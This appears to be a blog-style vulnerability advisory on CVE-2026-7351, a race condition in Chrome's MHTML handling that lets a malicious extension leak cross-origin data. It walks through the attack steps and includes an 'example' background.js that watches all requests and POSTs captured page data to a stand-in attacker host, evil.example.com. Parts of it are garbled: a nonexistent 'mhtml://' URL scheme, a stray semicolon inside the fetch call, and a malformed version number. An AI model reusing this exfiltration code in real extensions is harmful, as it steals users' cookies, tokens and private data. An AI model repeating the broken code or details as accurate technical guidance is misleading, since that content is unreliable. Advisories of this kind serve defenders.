Summary:
A newly disclosed vulnerability, CVE-2026-7351, highlights a race condition in MHTML handling in Google Chrome prior to version 147..7727.138. This flaw allows attackers—armed with a carefully crafted malicious Chrome Extension—to leak cross-origin data. The issue is tagged as high severity by the Chromium team because it enables stealthy and powerful data theft on affected systems.
What is MHTML in Chrome?
MHTML stands for MIME HTML, a web page archive format that packages HTML code, images, and other resources into a single file. Chrome uses this for saving and displaying complete web pages. MHTML parsing is complex, especially when you’re dealing with multiple resources, boundaries, and origins.
The Vulnerability: A Race to Leak Your Data
At its heart, CVE-2026-7351 is a race condition. That means Chrome’s processes could get out of sync while handling MHTML, especially when loading resources. A tricky attacker creates a scenario in which Chrome’s resource loading code reads sensitive data from another website, then leaks it to the attacker’s extension.
Attackers can only pull this off if they lure the victim into installing their malicious Chrome Extension. Once installed, the extension does the rest.
How Does It Work? (Deep Dive)
1. Victim Installs Malicious Extension: The attacker convinces the user through email, pop-up, or a fake website.
2. Extension Crafts MHTML Content: The extension triggers Chrome to load a crafted MHTML file (locally or remotely).
3. Race Condition Triggers: While Chrome fetches cross-origin resources, a timing bug lets the extension grab the data before security boundaries are enforced.
4. Sensitive Data Leaks: The extension siphons off cookies, tokens, or private messages from other sites.
Example Code: How an Extension Might Exploit CVE-2026-7351
Here’s a simplified version showing how a suspicious extension might read content as soon as an MHTML file is loaded:
// background.js in the malicious extension
chrome.tabs.create({ url: 'mhtml://file.mhtml' }, function(tab) {
// Listener for webRequest to catch leaking data
chrome.webRequest.onCompleted.addListener(function(details) {
if (details.url.includes('sensitive-data')) {
fetch(details.url)
.then(response => response.text())
.then(data => {
// exfiltrate to attacker's server
fetch('https://evil.example.com/log';, {
method: 'POST',
body: JSON.stringify({ leak: data })
});
});
}
}, { urls: ['<all_urls>'] });
});
Note: The real exploit would have to work around some modern Chrome protections, but the essence is that the extension can use privileged APIs and the Chrome MHTML handler’s flaws to fetch cross-origin content.
Check Permissions:
Extensions that want to "read data on all websites" are risky, especially if you don’t trust the developer.
References & Further Reading
- Chrome Releases: Stable Channel Update
- Chromium MHTML Documentation
- Chrome Extension Security Best Practices
Exploit in the Wild?
As of now, there are no reports of public mass exploitation. But the patch is public, and it’s just a matter of time before attackers copy the exploit. Chrome’s auto-update should protect most users soon.
Conclusion
CVE-2026-7351 reminds us that even the world's most-used browser can fall victim to subtle race conditions. By exploiting complex document formats like MHTML, attackers can cross security lines—IF we’re not careful with what we install. Stay updated, be careful with extensions, and keep your browser locked down for best protection!
> Want to dig deeper? Track Chromium issues at chromium.org and keep an eye on CVE feeds for updates!
Timeline
Published on: 04/28/2026 22:35:59 UTC
Last modified on: 04/30/2026 16:40:22 UTC